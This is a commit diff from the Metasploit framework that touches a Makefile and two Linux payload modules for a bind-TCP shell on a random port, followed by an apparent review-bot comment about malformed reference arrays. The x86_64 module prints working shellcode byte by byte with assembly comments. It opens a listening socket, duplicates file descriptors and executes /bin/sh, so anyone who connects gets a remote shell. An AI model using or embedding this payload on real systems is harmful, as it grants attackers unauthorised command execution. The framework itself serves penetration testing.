Merge pull request #1 from todb-r7/pr2350-fix-random-bind-port-shellcode

Fixes for #2350, random bind shellcode
bug/bundler_fix
Geyslan Gregório Bem 2013-11-11 08:53:22 -08:00
commit 81d82a77e8
3 changed files with 26 additions and 22 deletions


@ -1,11 +1,11 @@
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
stager_egghunt stager_sock_find stager_sock_reverse \
stager_sock_reverse_icmp stager_sock_reverse_udp \
stager_egghunt stager_sock_find stager_sock_reverse \
stager_sock_reverse_icmp stager_sock_reverse_udp \
stager_sock_reverse_udp_dns
STAGES=stage_tcp_shell stage_udp_shell
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
single_shell_bind_tcp_random_port
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
single_shell_bind_tcp_random_port
OBJS=${STAGERS} ${STAGES} ${SINGLE}
@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
@ruby -p -a -e ' \
$$F.shift; \
$$F[0].tap { |s| \
s.tr! "A-F", "a-f"; \
t=s.dup; \
s.clear; \
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
STDIN.eof? ? s<< " # " : s<< "+# "; \
s.tr! "A-F", "a-f"; \
t=s.dup; \
s.clear; \
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
STDIN.eof? ? s<< " # " : s<< "+# "; \
}; \
$$_ = $$F.join(" ") + "\n"; \
' < $*.tmp > $@


@ -15,11 +15,13 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
'Assembly source: http://goo.gl/TAveVc',
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
'Description' => %q{
Listen for a connection in a random port and spawn a command shell.
Use nmap to discover the open port: 'nmap -sS target -p-'.
},
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
'License' => BSD_LICENSE,
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Payload' =>
@ -31,21 +33,21 @@ module Metasploit3
"\x6a\x02" +# pushq $0x2
"\x5f" +# pop %rdi
"\xb0\x29" +# mov $0x29,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x52" +# push %rdx
"\x5e" +# pop %rsi
"\x50" +# push %rax
"\x5f" +# pop %rdi
"\xb0\x32" +# mov $0x32,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\xb0\x2b" +# mov $0x2b,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x57" +# push %rdi
"\x5e" +# pop %rsi
"\x48\x97" +# xchg %rax,%rdi
"\xff\xce" +# dec %esi
"\xb0\x21" +# mov $0x21,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x75\xf8" +# jne 40009f
"\x52" +# push %rdx
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
@ -54,7 +56,7 @@ module Metasploit3
"\x54" +# push %rsp
"\x5f" +# pop %rdi
"\xb0\x3b" +# mov $0x3b,%al
"\x0f\x05" # syscall
"\x0f\x05" # syscall
}
))
end
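Review bot: The new `'References'` entry in the first hunk of this section, `'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm']`, is a flat two-element array, whereas Metasploit module info expects a list of `[type, value]` pairs, so the type string and the URL would each be read as a separate reference; unless the page rendering dropped the inner brackets it should be `'References' => [['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm']]`. The same flat form appears in the third file's section. There the referenced source is named `shell_bind_tcp_random_port_x86_64.asm` while that module declares `'Arch' => ARCH_X86`, which looks like the two URLs may have been swapped between the x86 and x64 modules — worth confirming against the upstream repository. The `initialize` body opened in the first hunk continues through the later hunks of this section.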


@ -15,11 +15,13 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
'Assembly source: http://goo.gl/V5OObo',
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
'Description' => %q{
Listen for a connection in a random port and spawn a command shell.
Use nmap to discover the open port: 'nmap -sS target -p-'.
},
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
'License' => BSD_LICENSE,
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Payload' =>